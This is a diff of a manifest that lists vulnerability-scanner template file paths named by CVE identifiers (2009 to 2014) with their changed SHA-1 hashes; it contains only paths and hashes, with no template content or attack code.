-http/cves/2010/CVE-2010-1534.yaml:f075cb6ada1cb27db8e63fae82a6fb0bfebbd515 -http/cves/2010/CVE-2010-1535.yaml:b5bafa22f4b29ef3318298757f47ae179402dbe2 -http/cves/2010/CVE-2010-1540.yaml:233a3090a34bcf664417a2cf0732c0e4d44961e5 -http/cves/2010/CVE-2010-1586.yaml:f93d7e655344a1e1f0adc8a234bd95a4d421bde2 -http/cves/2010/CVE-2010-1601.yaml:175ba86d869f912b9c0292e35f7426c40720c834 -http/cves/2010/CVE-2010-1602.yaml:d9e5e19a2cc6dbf73be167022c03e7d9921212a6 -http/cves/2010/CVE-2010-1603.yaml:6299e8f6ca6c47340774af81af19466ffab9fa72 -http/cves/2010/CVE-2010-1607.yaml:7b311b701b4b6b84291cf480fb27b1b0f83ed387 -http/cves/2010/CVE-2010-1653.yaml:53b513d56406176138f6e6fab887bf030fca0d7c -http/cves/2010/CVE-2010-1657.yaml:ae9f4e75b8b9471651a0939f97a547421ef4ed79 -http/cves/2010/CVE-2010-1658.yaml:35007feba7d64e09b0c2a1ed14e6ef129b0cac7c -http/cves/2010/CVE-2010-1659.yaml:d6ef8f4a1381ac803cc0a51891d80c88e371b708 -http/cves/2010/CVE-2010-1714.yaml:1f390d3d4eb84f2e23053160535c18c8eb4838ae -http/cves/2010/CVE-2010-1715.yaml:0fa7670c5debe75862e402b6df70f6ba9bccb4c3 -http/cves/2010/CVE-2010-1717.yaml:07c76f226ffe7e3d0bc63cf620ea28db7d5904d3 -http/cves/2010/CVE-2010-1718.yaml:95e8cefb11f521932d3fcaed6125fd43f46d0c47 -http/cves/2010/CVE-2010-1719.yaml:a797b8202dc6651bc4c211359b485ebf103e19d9 -http/cves/2010/CVE-2010-1722.yaml:e9b6286a2693d3996c4333f32823a4e36026c158 -http/cves/2010/CVE-2010-1723.yaml:e7390ced6454d55bca82add004b747265d71f678 -http/cves/2010/CVE-2010-1858.yaml:e46e7d80d083b6279326fd0fc00bcdce0e1c07bc -http/cves/2010/CVE-2010-1870.yaml:1de6a3d673266a33d118230636251395a0e820f0 -http/cves/2010/CVE-2010-1875.yaml:7f7ae1342ad966f79fb30bded1c61962aebb3e7f -http/cves/2010/CVE-2010-1878.yaml:5a73b7f3a83299a1d86fd829634b1231008c0e36 -http/cves/2010/CVE-2010-1952.yaml:d845336ea46ae1a53c251187c4a93ee147926eea -http/cves/2010/CVE-2010-1953.yaml:97c2c9c1961d6b33609c7997d324bbfcca626288 -http/cves/2010/CVE-2010-1954.yaml:9e6a3452871767ecd3c5a33c4438c299326fb354 -http/cves/2010/CVE-2010-1955.yaml:254f175dc54f428c32b19577847fd4c45d5e4a40 -http/cves/2010/CVE-2010-1956.yaml:a9b13a4ffbf784eba101f939fe54a46e156282f2 -http/cves/2010/CVE-2010-1957.yaml:4d06abfee1306369e15a0be066c70c3ba080f03d -http/cves/2010/CVE-2010-1977.yaml:2017457e0b6630f0aea95a0c79057ffce4bae539 -http/cves/2010/CVE-2010-1979.yaml:c180cc0847143545d26fa5678e738fb373b991be -http/cves/2010/CVE-2010-1980.yaml:2f2d107a030d288a08e04978b37e973005fcadb1 -http/cves/2010/CVE-2010-1981.yaml:e172d1ba0c5f4baae72e2d1bce0044eb664513ea -http/cves/2010/CVE-2010-1982.yaml:ae34c13d420259a63b111b2d4e2fad0d7120723c -http/cves/2010/CVE-2010-1983.yaml:08f828a8d617358130394d3c90f99c90a4743486 -http/cves/2010/CVE-2010-2033.yaml:66da5529438c391ba903e3e01b51adb63a0c68f0 -http/cves/2010/CVE-2010-2034.yaml:b4429b5d56d31cfe5acdbe865d69bcd2c3962560 -http/cves/2010/CVE-2010-2035.yaml:3286f9133ff7daf8cfbf154d765a55677d0458d2 -http/cves/2010/CVE-2010-2036.yaml:6580bebf052baa2edb61ae40b40bde1109ed1ec3 -http/cves/2010/CVE-2010-2037.yaml:8957d597db4d51d40d0890d0419c2e041cdb3ecc -http/cves/2010/CVE-2010-2045.yaml:4da81333b7489d8353391b79b83ecaaca98de63e -http/cves/2010/CVE-2010-2050.yaml:0e723f614afc82df7e891b24564c589d1c1898da -http/cves/2010/CVE-2010-2122.yaml:e4020c5e6a6bf7d1237f627b10ef00d4c2d2505a -http/cves/2010/CVE-2010-2128.yaml:b4d7f89a45a30d7a308b14a1d662d527d0f54e3a -http/cves/2010/CVE-2010-2259.yaml:2e0424028fa0a831b90664581ec4b019dfcb65bb -http/cves/2010/CVE-2010-2307.yaml:dffeb1b999c24d67f7bf1736ea38c6aee86292c1 -http/cves/2010/CVE-2010-2507.yaml:5c4fc0ace09e73f043995ebcbf67a79845abad08 -http/cves/2010/CVE-2010-2680.yaml:a2662ddea1b5715badd3d3271f8cec0260964578 -http/cves/2010/CVE-2010-2682.yaml:624bcbfea95fee2665b86b544e6e4a3baa6b6809 -http/cves/2010/CVE-2010-2857.yaml:055cd76dcfef16e4e81473da039d9d65410e6266 +http/cves/2009/CVE-2009-0932.yaml:b19fa32886320d5b0ecb812359b2d7e30430edab +http/cves/2009/CVE-2009-1151.yaml:689ec829efd3e219750512cd417c1d7b71e053f7 +http/cves/2009/CVE-2009-1496.yaml:1ae3f7ae4a7872c99ad8060b79f38c80b910eb63 +http/cves/2009/CVE-2009-1558.yaml:38a874e8d6852176c3c855c2030d82174c477dcb +http/cves/2009/CVE-2009-1872.yaml:c63bd4cab85c8b422783985b72d458311bc6074f +http/cves/2009/CVE-2009-2015.yaml:4593468c46f795e56360fbf1e8eaaf5f70aa12e2 +http/cves/2009/CVE-2009-2100.yaml:f2da340268481636eba23f5cae86b36fb38cbdb6 +http/cves/2009/CVE-2009-3053.yaml:94925241a7c769c9f9120e534a7885a8bcfd99bf +http/cves/2009/CVE-2009-3318.yaml:9e559947bb64f1b99125b1fd8425e9a9384aa979 +http/cves/2009/CVE-2009-4202.yaml:c82f6ddb86601ba2470030242bd811210072d5eb +http/cves/2009/CVE-2009-4223.yaml:35ce780a8936f766aa059baf1f4db4aa6370684f +http/cves/2009/CVE-2009-4679.yaml:5d5077dff815333753fda16cd5fb228b9b1fb640 +http/cves/2009/CVE-2009-5020.yaml:2768584859ba688ee85344c4211a7f041040c694 +http/cves/2009/CVE-2009-5114.yaml:3801dd9e60025b512abacd820836688918e9ce40 +http/cves/2010/CVE-2010-0157.yaml:0583139639f5d8d180c2d67f86f85bf0df23451c +http/cves/2010/CVE-2010-0219.yaml:02e01ef9db973f9c4d6a0195e172168bc3cd8498 +http/cves/2010/CVE-2010-0467.yaml:6bbf14d1ab46e831cebc88a5a6eb3d597b9ef3c3 +http/cves/2010/CVE-2010-0696.yaml:f512c49cb97efb1cf501e548e87e4e7ec4fa6ef6 +http/cves/2010/CVE-2010-0759.yaml:c54f0d373e3f0c4f4633dade31e50bc190f40a71 +http/cves/2010/CVE-2010-0942.yaml:0a4d557d1b24787ea8cf14a565fa1c5c778a4f3f +http/cves/2010/CVE-2010-0943.yaml:922c1518f163d41b8da1c3be2d4151872d9064b0 +http/cves/2010/CVE-2010-0944.yaml:d2d4f792308e3b50dc3cc1e0297eaf957901474c +http/cves/2010/CVE-2010-0972.yaml:85b3b14667c03a4402628160ee47a899c0c02803 +http/cves/2010/CVE-2010-0982.yaml:a34ea798bd5a246b39a8ec4ba9c73a584ef6502c +http/cves/2010/CVE-2010-0985.yaml:3d7d04c87b78eb3175c56d0746385e2be3821c21 +http/cves/2010/CVE-2010-1056.yaml:be4f204f731f413944f565dbd33a5e330ea952e5 +http/cves/2010/CVE-2010-1081.yaml:3749a581e9d575076b65a1bbaba9494b6f5967dc +http/cves/2010/CVE-2010-1217.yaml:ce0795e631bc53222b8706bbf32cc81759bd7fdd +http/cves/2010/CVE-2010-1219.yaml:6b58e5a2ae3e4f90bce6c64a411dbe7ca560060f +http/cves/2010/CVE-2010-1302.yaml:53f367155e8108f92d6feb4584ff7df1cd5fff89 +http/cves/2010/CVE-2010-1304.yaml:0fbe1672741d94932efcc1b45794e07f7b0f5bb0 +http/cves/2010/CVE-2010-1305.yaml:48a854efd3eb4aaab88b27a6d259b351c506397d +http/cves/2010/CVE-2010-1306.yaml:fa926da1993a06970a225020bb5e6f417129bdc1 +http/cves/2010/CVE-2010-1307.yaml:bd07b09b2a2a99ebac3066a45772c641f1d10d9c +http/cves/2010/CVE-2010-1308.yaml:4a630183099ada0c51ab34e1cb8bb4d71d81b902 +http/cves/2010/CVE-2010-1312.yaml:e05e02f485f1aa7838f202579ab2141f130776eb +http/cves/2010/CVE-2010-1313.yaml:3b4749d8edd2566aaf4ffb39feb1fc61e3fec89f +http/cves/2010/CVE-2010-1314.yaml:3daa7d6d9379cee4e5f57d859b0723328a718ba5 +http/cves/2010/CVE-2010-1315.yaml:d94df362f465e94eba33b724283ebaeed1361d67 +http/cves/2010/CVE-2010-1340.yaml:d4db60fdba020e9f478b25c5b90a8b06c30cf4a9 +http/cves/2010/CVE-2010-1345.yaml:5735e03ea362583efda98794506957cc11d0052f +http/cves/2010/CVE-2010-1352.yaml:2c7789b0184a5a02fa196da0a290297c38ce33fb +http/cves/2010/CVE-2010-1353.yaml:73799ca45f57ad1e8a873402f14aa364ff800eed +http/cves/2010/CVE-2010-1354.yaml:420a18891d63fa521e098a6ecd6130de57cc2a33 +http/cves/2010/CVE-2010-1429.yaml:6ed890651a986c48e3ffb86ab0861e92af9504d4 +http/cves/2010/CVE-2010-1461.yaml:f1583ca74851018459907ca282fba903752d5332 +http/cves/2010/CVE-2010-1469.yaml:a0c651ff41fd42b8ffe4e242a2073db83d040c7d +http/cves/2010/CVE-2010-1470.yaml:95c9c1cf146e7e9be2bc1f478b311c3831aac81e +http/cves/2010/CVE-2010-1471.yaml:6425a679ae9cc3c7865df862accccee02f876668 +http/cves/2010/CVE-2010-1472.yaml:e2b3f96062b78b7e3b052192348262457da6ab16 +http/cves/2010/CVE-2010-1473.yaml:db864fd87ee4c220838af7667fab52f8a0e8f069 +http/cves/2010/CVE-2010-1474.yaml:bb52db200b4358152b9f9200d7ef108a0fb4f4fe +http/cves/2010/CVE-2010-1475.yaml:0be228583d43e21331e23f034b2dec1799631d22 +http/cves/2010/CVE-2010-1476.yaml:9c9fb716f1b34fb71dc005c2ab05fe87c39db35d +http/cves/2010/CVE-2010-1478.yaml:b408642803ad02a18c60daeccdefd2c24f7d7a95 +http/cves/2010/CVE-2010-1491.yaml:b3c7026429df38721cb8f813e1b26a7c7cae4776 +http/cves/2010/CVE-2010-1494.yaml:f8aff7993266f3ebfde8e064d961ba565727df4f +http/cves/2010/CVE-2010-1495.yaml:52eb23ea4bbab332b21a1153b4811fbe41ab46fa +http/cves/2010/CVE-2010-1531.yaml:9a8d5f6c691808af4582c896286b8674c53aadc2 +http/cves/2010/CVE-2010-1532.yaml:00fa43963a78fe7b07aca5548f2f79457a106187 +http/cves/2010/CVE-2010-1533.yaml:3f9395926fa021706ad442e7defbb01e72ab918f +http/cves/2010/CVE-2010-1534.yaml:080bf748733d6d77ae15498da0dc2150c5abd087 +http/cves/2010/CVE-2010-1535.yaml:2e94e14bbf4f2eea21b8a7eba992d7b2c17f1146 +http/cves/2010/CVE-2010-1540.yaml:865906f1d43a99833d59c07ce4a61bf9159f11ff +http/cves/2010/CVE-2010-1586.yaml:5531bdda6f3de65ef644e1d742ab1efd271aa039 +http/cves/2010/CVE-2010-1601.yaml:06a0f8a4756b8cdd716f2c9bcc93ae02cddb7eb8 +http/cves/2010/CVE-2010-1602.yaml:d1eb7535cf997000c94fec36263187ba84e9c280 +http/cves/2010/CVE-2010-1603.yaml:3d5e2a8f7043fc9b76a8f458fa5198448b8f7fb0 +http/cves/2010/CVE-2010-1607.yaml:a04d2e8a864c45d547311841ca4196b3ec0b8103 +http/cves/2010/CVE-2010-1653.yaml:c087bfa59d2d23ff94d2311c62014b5c29393150 +http/cves/2010/CVE-2010-1657.yaml:51b204f8d512f8a17efe12d9cfc04454ac72573d +http/cves/2010/CVE-2010-1658.yaml:8397ccf63160350ca6df00982e2d19da060de6da +http/cves/2010/CVE-2010-1659.yaml:c285779e2b2d81a770cd6a8a8df4dafdb41b4a3a +http/cves/2010/CVE-2010-1714.yaml:8c6a58c84e0b8a3ae27936d02bf3b3a4905f5742 +http/cves/2010/CVE-2010-1715.yaml:b15fa97041f99b671a962b8e75a7893ec4931a59 +http/cves/2010/CVE-2010-1717.yaml:1f19013be4b9308f0ba4310162a5267827b70bca +http/cves/2010/CVE-2010-1718.yaml:b22c91b1197aae9c0423295f148bdda491993271 +http/cves/2010/CVE-2010-1719.yaml:7d85df8073ab7ccd8ae9733397fb6234d8922ed7 +http/cves/2010/CVE-2010-1722.yaml:44d997ae6a1016d8d1ec9e75a6669fab394ac238 +http/cves/2010/CVE-2010-1723.yaml:d75cc24a4f9b53605e1192fab01aceb55d9ca7a1 +http/cves/2010/CVE-2010-1858.yaml:287791e937efdf5cd956c6036658f00d5ac82766 +http/cves/2010/CVE-2010-1870.yaml:8d8cf515658fd1dbfa22c78797c4f8583774c7de +http/cves/2010/CVE-2010-1875.yaml:8ddd7e14a8b5f1291672f31a0170029c460f97f1 +http/cves/2010/CVE-2010-1878.yaml:e33dccaa29408a992074a77436b02238d10853c9 +http/cves/2010/CVE-2010-1952.yaml:79f0f75ddca7474f662f9d1ed5a7de36ffdeab4f +http/cves/2010/CVE-2010-1953.yaml:2539c2b8a7ed477018b898560da946fd7ae3ce81 +http/cves/2010/CVE-2010-1954.yaml:05e5e689404c838986b5b07f82d1916076020b96 +http/cves/2010/CVE-2010-1955.yaml:c618e5cf6f7e8e679eeafb05edb9ffdc144d9a8c +http/cves/2010/CVE-2010-1956.yaml:4f815fbc3b6e4bcc2e2db37fa55613e496866a32 +http/cves/2010/CVE-2010-1957.yaml:d1d6fd4cac4b381caaee611eba59b9be70573af7 +http/cves/2010/CVE-2010-1977.yaml:ffbff231242f8a0f1adb143028bb3553295cfc88 +http/cves/2010/CVE-2010-1979.yaml:67a8a9b04e8675a5c776767dbfc1e8179bb4e116 +http/cves/2010/CVE-2010-1980.yaml:2b283a374b9c6ba22229305691471598993e8a1a +http/cves/2010/CVE-2010-1981.yaml:44cef5b5451d5ffcaf7be48f8ab4f552d0c13afb +http/cves/2010/CVE-2010-1982.yaml:d1bad5e5d67791643c437cf145f3997e3eb4866f +http/cves/2010/CVE-2010-1983.yaml:82a946ffd3bfee1eef0a71c438d65a7c58c6a0ec +http/cves/2010/CVE-2010-2033.yaml:e919127b3f05ade2878f670a8441db27070f1673 +http/cves/2010/CVE-2010-2034.yaml:24558af27a09e05ee10af07971be2e6227063510 +http/cves/2010/CVE-2010-2035.yaml:d258216633521680e1bc1a7e7d595509ea2716ca +http/cves/2010/CVE-2010-2036.yaml:b08ceffd64380e37d62677fa1e2321042675e2e1 +http/cves/2010/CVE-2010-2037.yaml:26bb5946e57f87fe19bfaff584f1c2d4018a7420 +http/cves/2010/CVE-2010-2045.yaml:4dda17755c4d6d77ab401f7b8670c8fc76427969 +http/cves/2010/CVE-2010-2050.yaml:ea04a5ba24d3234a9470b0712ec64a867c9d14bb +http/cves/2010/CVE-2010-2122.yaml:dc9083ded22c2128c7ea1a4dd6faba024e683d59 +http/cves/2010/CVE-2010-2128.yaml:7f3ab1f8f8499bca97e49ca621564467cf5028db +http/cves/2010/CVE-2010-2259.yaml:dacbd5137fcb685748fb7772f5282c4a2687f4fd +http/cves/2010/CVE-2010-2307.yaml:08f4bbc8f3d4c06f178785abeed006050859ae4e +http/cves/2010/CVE-2010-2507.yaml:47bcbe607dfe4b17f4840af63580438f9c857966 +http/cves/2010/CVE-2010-2680.yaml:9f12e3d4932ce5b368725e8354621eef04a58508 +http/cves/2010/CVE-2010-2682.yaml:dc6cfde01399afd1f5ce7cd6414b49d126e2ac51 +http/cves/2010/CVE-2010-2857.yaml:cb39a198e5037c87f8c4da636cce5c665b954d5a http/cves/2010/CVE-2010-2861.yaml:a28a0233aeeb248fcc1faba4b9eb4fb292bfc8c6 -http/cves/2010/CVE-2010-2918.yaml:c5440792cceb174aa2ba80b689bcde339515bad2 -http/cves/2010/CVE-2010-2920.yaml:80eb889a167d9d20aeff2c948bbbb623598aadc9 -http/cves/2010/CVE-2010-3203.yaml:3e13f0cb9d08385482f73677d6ad39a4a257b0ae -http/cves/2010/CVE-2010-3426.yaml:f9a6eee466f0c353b01d3b731ce8a2952db6be0f -http/cves/2010/CVE-2010-4231.yaml:92cd72535c15250ecba1dae6dcbf1ea5a0a26347 -http/cves/2010/CVE-2010-4239.yaml:94ef94d133b0fd6471d4973856b0b76331a95367 -http/cves/2010/CVE-2010-4282.yaml:40afe55dc218287426d3a6d3d4217156daea3c5f -http/cves/2010/CVE-2010-4617.yaml:27c5c856f2221f0b075ba03329fc212f14367af2 -http/cves/2010/CVE-2010-4719.yaml:d4712ee0ba7cc452a3a0bce1f894b5a5bbd2970c -http/cves/2010/CVE-2010-4769.yaml:177311524e657e323e9d723441b062fe9fbbb7da -http/cves/2010/CVE-2010-4977.yaml:0f752cc9724a0c4843720c9526c48f29b7302696 -http/cves/2010/CVE-2010-5028.yaml:1a26184fe5826e2ceae2082148fa5179215cabd7 -http/cves/2010/CVE-2010-5278.yaml:c261cbf7eccc79b9752de46d2fc84191b5234be8 -http/cves/2010/CVE-2010-5286.yaml:3d1ba9fd5045033ab1aacf09ab835adacdb4b73e -http/cves/2011/CVE-2011-0049.yaml:2b03d13fc5563f35e1d2a723369ee50285b1d233 -http/cves/2011/CVE-2011-1669.yaml:b50c8de5c0bee671ee1b4894fbcecddbed8a2afa -http/cves/2011/CVE-2011-2744.yaml:7dcda993f46517aba530f2db3fbcf2b9e34f2eff -http/cves/2011/CVE-2011-2780.yaml:d24607ffb42b3f46326c4136c5f8dffd52ea3553 +http/cves/2010/CVE-2010-2918.yaml:50c03eeb9e33b4fb1cc1e79de3b55e643acabe89 +http/cves/2010/CVE-2010-2920.yaml:a36209e8ed68841d4f29c76a219ac234b5dc6b26 +http/cves/2010/CVE-2010-3203.yaml:c9fc4cf98ea01fc7935b4cff42c8a284876b2081 +http/cves/2010/CVE-2010-3426.yaml:3e286c582fc1e51c8b3621aca9e4c1cc14b45c4a +http/cves/2010/CVE-2010-4231.yaml:1ae9dffcb7dbf8709770ef9228708e3ad29c324a +http/cves/2010/CVE-2010-4239.yaml:e11da6084bc1a68b80e95c106d6a59508d6732ed +http/cves/2010/CVE-2010-4282.yaml:036b1d068f5439b97cfdde52792510535f01ee75 +http/cves/2010/CVE-2010-4617.yaml:3c3a46b51cc3a6918e4fd024f416465325aaff3f +http/cves/2010/CVE-2010-4719.yaml:21785e62e6c708fa6c3a9cef727d865a0037bb0c +http/cves/2010/CVE-2010-4769.yaml:40355900d4fad6470cb1c6c73a257259f9e819f3 +http/cves/2010/CVE-2010-4977.yaml:b01c8bf21f836e991d369c2b207b634637a7c236 +http/cves/2010/CVE-2010-5028.yaml:5d613f2e36a88d145d1e02ebb58a63afa81a678d +http/cves/2010/CVE-2010-5278.yaml:1c012dcc62af570e2b2f96019fd66987f96d0354 +http/cves/2010/CVE-2010-5286.yaml:a7bddb35574eccd7ba02ffadc6ee45b719b05546 +http/cves/2011/CVE-2011-0049.yaml:3ebf76034ab99dfd38c2b98a954e8b3221dc053b +http/cves/2011/CVE-2011-1669.yaml:420e6c0d261d9bd13b165ea1fd0c84564aec0a3b +http/cves/2011/CVE-2011-2744.yaml:9897a4f0c00d48d80e7bbca9f621a9589979e377 +http/cves/2011/CVE-2011-2780.yaml:8f5fd5e90f8003851669d5171fa2ccf55dcb113e http/cves/2011/CVE-2011-3315.yaml:cfe279d4b10bb959368be9b83f2a87a2af869eca -http/cves/2011/CVE-2011-4336.yaml:29b1814c6c704fc1f4b9d0186671cdd08bbe1943 -http/cves/2011/CVE-2011-4618.yaml:4e60e83df2579d39c171d5322fd283f0305cbc63 -http/cves/2011/CVE-2011-4624.yaml:dd499e7b61d93d022f6d31e113ad1d7a8acd4730 -http/cves/2011/CVE-2011-4804.yaml:d64c69751e91072c3a850f24d4d48c9f98b3f17b -http/cves/2011/CVE-2011-4926.yaml:aa3efe3610546da996d8fad64bb72f6446fe8dcb -http/cves/2011/CVE-2011-5106.yaml:0ee6233f8859d710794f80b42185a93715f0dd4e -http/cves/2011/CVE-2011-5107.yaml:c3d40fa54a4c5fb33de968fe4147165ebeeac6c3 -http/cves/2011/CVE-2011-5179.yaml:a662354ef77133cb3c1ea64e9d8d06312d2ff9bf -http/cves/2011/CVE-2011-5181.yaml:2240f89f97bf233976222941bc2001f5af58bcee -http/cves/2011/CVE-2011-5252.yaml:76106b661b838cfe50c35a75b10f0d1550a848b4 -http/cves/2011/CVE-2011-5265.yaml:5b16fc9a836eec50937dbd9c5ad344fa02e5253b -http/cves/2012/CVE-2012-0392.yaml:870848813498e961d6ebf12806eb8c9582880c00 -http/cves/2012/CVE-2012-0394.yaml:72fe3b339b16d721020dbb4edb5cce093d311a39 -http/cves/2012/CVE-2012-0896.yaml:80bc702014cd6a31cfd5fc7c9ffd28aca4a4db7f -http/cves/2012/CVE-2012-0901.yaml:8bc963f4241d694a593d445cdbb3410c18575fa4 -http/cves/2012/CVE-2012-0981.yaml:1bfd01016cef4758ff89f0058bff080d9c304870 -http/cves/2012/CVE-2012-0991.yaml:f754471faf54ea36b78d34ea6ff261695fb08f31 -http/cves/2012/CVE-2012-0996.yaml:758628c147ca50eccd1c580685596808f5e1fc04 -http/cves/2012/CVE-2012-1226.yaml:283455e26a357e0bfd81226c18e9782eb7a5eddc -http/cves/2012/CVE-2012-1823.yaml:0fcf37ee2e03e9b6cf45b0c7924d440bd756dd28 -http/cves/2012/CVE-2012-1835.yaml:7aa2ea970e7b36c7983aa1efed5010647be468db -http/cves/2012/CVE-2012-2371.yaml:466164765f73a018e9b24dd6bd40a454d67e4cb0 -http/cves/2012/CVE-2012-3153.yaml:eec2f76530da34aedb2bf556da2d80bc5d31b20e -http/cves/2012/CVE-2012-4032.yaml:da86b5352f8a7fb6ea879c48abe56b77f5ad42a5 -http/cves/2012/CVE-2012-4242.yaml:c4efef87dcd9d3c3790fb4258b77976073d73f5f -http/cves/2012/CVE-2012-4253.yaml:5322a94fd335456be9c556cd0ddcaadaa84a850f -http/cves/2012/CVE-2012-4273.yaml:2512569ef5f19e71c715399948b4cd696f294a71 -http/cves/2012/CVE-2012-4547.yaml:7c869e76d6bd4f8183ba64d530030e0cd3c4adc3 -http/cves/2012/CVE-2012-4768.yaml:23428eee4f28ef3a1a7d35fc1af3b19afe358bcb -http/cves/2012/CVE-2012-4878.yaml:1fcd1218ff0fdd619511ca2649986b690ae893e9 -http/cves/2012/CVE-2012-4889.yaml:4fc7de76eafd8febe254987b6a2f7b70102e1fe0 -http/cves/2012/CVE-2012-4940.yaml:8644f42f013de62b6c3e1e176b3efb9d24c19901 -http/cves/2012/CVE-2012-4982.yaml:5343d4ee9bbcc8fb646d694b3c9bcf19b1f88d8f -http/cves/2012/CVE-2012-5321.yaml:35ce177d022957377bcf92615b1731e8b6b7ebda -http/cves/2012/CVE-2012-5913.yaml:1975390dd24897c8f8941671948842beb65cb494 -http/cves/2012/CVE-2012-6499.yaml:560f7343c270c46322992254a5e6f92a44ec68f6 -http/cves/2013/CVE-2013-1965.yaml:89dd88ce2bf2aaffb0dd27287dd40cccf5acdba1 +http/cves/2011/CVE-2011-4336.yaml:6dcd5125df25fd48738e2e4dac4aaea8c0c126bd +http/cves/2011/CVE-2011-4618.yaml:70804fe254435020dc8ce61b0cf106d98d46e3ce +http/cves/2011/CVE-2011-4624.yaml:713b8d62c1db934a58f26f1b40f0de238078966a +http/cves/2011/CVE-2011-4804.yaml:473c2b286ffa5aa1c35160e4af74a3dc11e76751 +http/cves/2011/CVE-2011-4926.yaml:6d56eb70caafd45d51a5ed8791ec982609bcd26f +http/cves/2011/CVE-2011-5106.yaml:404541714bac87c0f39929270d24a08448e24cb3 +http/cves/2011/CVE-2011-5107.yaml:3e7c933d2f918c7b796feb12e154ebc3e6f1ed31 +http/cves/2011/CVE-2011-5179.yaml:27d4e0726bc4ea9398827c856ae50b854283f5d8 +http/cves/2011/CVE-2011-5181.yaml:6cc71e3eaf583a723ba752042863f3e56796c3d1 +http/cves/2011/CVE-2011-5252.yaml:b6e4df680f87c289f835b2ddebc4d831d8f17777 +http/cves/2011/CVE-2011-5265.yaml:0d4b3730a441b140e058fba7887bf7203a54ad3e +http/cves/2012/CVE-2012-0392.yaml:cb2825935fed34a16052c543f8620388fe9dbd62 +http/cves/2012/CVE-2012-0394.yaml:bbb29dfcc41ef82283083e697babdb6536107f5d +http/cves/2012/CVE-2012-0896.yaml:0ee2e081e4361cdef73f087a245a604ba0442fe9 +http/cves/2012/CVE-2012-0901.yaml:c94354a586123e2eadbac6658ebecea66457cba5 +http/cves/2012/CVE-2012-0981.yaml:03525fb14bec7660c073c7ebb52ce28fb1d74748 +http/cves/2012/CVE-2012-0991.yaml:e4736a771137039d473e862c170650980876013e +http/cves/2012/CVE-2012-0996.yaml:c29e50b5a8f4e58519fda8029285586989b83de2 +http/cves/2012/CVE-2012-1226.yaml:ecda9505aa702ebfdf02e098ebd4c144a4b85606 +http/cves/2012/CVE-2012-1823.yaml:707c0b64671ffd0e35345015a28c546b5561249e +http/cves/2012/CVE-2012-1835.yaml:71ea2751a8a85e520f9897f9e67118294a30704e +http/cves/2012/CVE-2012-2371.yaml:ea4182fc53597edf03eb86bcd49f315eb692c6c6 +http/cves/2012/CVE-2012-3153.yaml:5de084bec3ffb36ec20b76fa658acbf8dbe42c9d +http/cves/2012/CVE-2012-4032.yaml:67ece4954d9197f505da8d100478c41d55ccdfa0 +http/cves/2012/CVE-2012-4242.yaml:4c8ec7f47462d3d3052026e7fb8835e84a3c4e2f +http/cves/2012/CVE-2012-4253.yaml:0a06775d359ea9ea6c37c7acc7cf3a0500f6eec8 +http/cves/2012/CVE-2012-4273.yaml:38a6ecc521a6e97f7194a74bb473e066a23cc3f5 +http/cves/2012/CVE-2012-4547.yaml:fd2b8c0c5e5a53be99495fe21132c8ad27a81dfc +http/cves/2012/CVE-2012-4768.yaml:d9aae9674149f09de49e847a23433e6b82caa5a9 +http/cves/2012/CVE-2012-4878.yaml:45cdd4288217fd8569b0318e46ecedd83cd319d3 +http/cves/2012/CVE-2012-4889.yaml:a7afbb3c5a74cb9e6adf3f9a7776dc9bdef83a61 +http/cves/2012/CVE-2012-4940.yaml:0650624142d894496a406438a29d2af3a8459386 +http/cves/2012/CVE-2012-4982.yaml:45bd34a9d93b9bcb8c5516ce5d0fed623d7a20f2 +http/cves/2012/CVE-2012-5321.yaml:88a9bff05fe32780a4dfdeaa2dd33d18c6b2003f +http/cves/2012/CVE-2012-5913.yaml:ef3fd2d088c9243c72b5e3cf3ef503406a120e11 +http/cves/2012/CVE-2012-6499.yaml:96760ec5a592c4346acc74ee4f32c9af58b541cf +http/cves/2013/CVE-2013-1965.yaml:c5c804a542d0cf150f2d827362ae44239e17061d http/cves/2013/CVE-2013-2248.yaml:52af21a8be9a59720dd23a52240bf7e8c72ae76f http/cves/2013/CVE-2013-2251.yaml:1230397278455e120e1e6d6529356aa3f65cd61f -http/cves/2013/CVE-2013-2287.yaml:e01ea9dee6a8a77e8631283ee6c2ecc480a4c8b7 -http/cves/2013/CVE-2013-2621.yaml:5c0a2ca95d9322114db549fd1d64ffc15445d268 -http/cves/2013/CVE-2013-3526.yaml:e59bd7356a2ed348d060513c625cda33b307050a -http/cves/2013/CVE-2013-3827.yaml:471575d6a3122fcac8a003f234fb76d3d87b9ee4 -http/cves/2013/CVE-2013-4117.yaml:8a88c76ced802dfcf6051c0d37c632397f737a78 -http/cves/2013/CVE-2013-4625.yaml:f02c1c19c27503196f59fd45b48e8854b519d9d1 -http/cves/2013/CVE-2013-5528.yaml:3318886ea6d53798158e5b9de219f9f03dac5b35 -http/cves/2013/CVE-2013-5979.yaml:d2737b3f69d1ee43b3ba48ebf50f1d09fb508a12 -http/cves/2013/CVE-2013-6281.yaml:0b93404feb3c3783adb0f7264b26da1477e70636 +http/cves/2013/CVE-2013-2287.yaml:6411888bd5df99c48ba9e51a406190fe342f6d35 +http/cves/2013/CVE-2013-2621.yaml:b1eb05c7e896b0faa0d2fb2a30ae69516ffed62d +http/cves/2013/CVE-2013-3526.yaml:ba88426323e0ddf0737a07a504b68da02d926f1f +http/cves/2013/CVE-2013-3827.yaml:c18ac21dfd28fd3fbd9b90348142a8e950848dc9 +http/cves/2013/CVE-2013-4117.yaml:23cf560bf4574381225532667846fd209d0b71f9 +http/cves/2013/CVE-2013-4625.yaml:63387fb43989deeff0f90c977ec0112d3939704f +http/cves/2013/CVE-2013-5528.yaml:0166634951c8e1aa742b5fce17aa78f826430e5d +http/cves/2013/CVE-2013-5979.yaml:776c661ff024d5485e867238d07e194c7154be4d +http/cves/2013/CVE-2013-6281.yaml:40ef83fa07d967308a69daf2a5905ac3ad135799 http/cves/2013/CVE-2013-7091.yaml:787ebc4d72bbed03124fc1667508cf58a9d6a5ab -http/cves/2013/CVE-2013-7240.yaml:2ceb66c70176361e7dd62936f324523d106749bd -http/cves/2013/CVE-2013-7285.yaml:bfa2a7db48a99f25450f8cb15382e0d68924968b -http/cves/2014/CVE-2014-10037.yaml:bd1888248a3ae73b254c49b4a5316f4144500924 -http/cves/2014/CVE-2014-1203.yaml:44d2c7f8aa796178b53c4e7375fe7c3f772f0a95 -http/cves/2014/CVE-2014-2321.yaml:de9845958fafd9d60c1edc2141ea0fb3ba6af789 +http/cves/2013/CVE-2013-7240.yaml:81ef2e0f547c202a2c67c19cafbcc48e4ce58bef +http/cves/2013/CVE-2013-7285.yaml:b9a38581f95d91ffb3919acbe21109dd5246ef3b 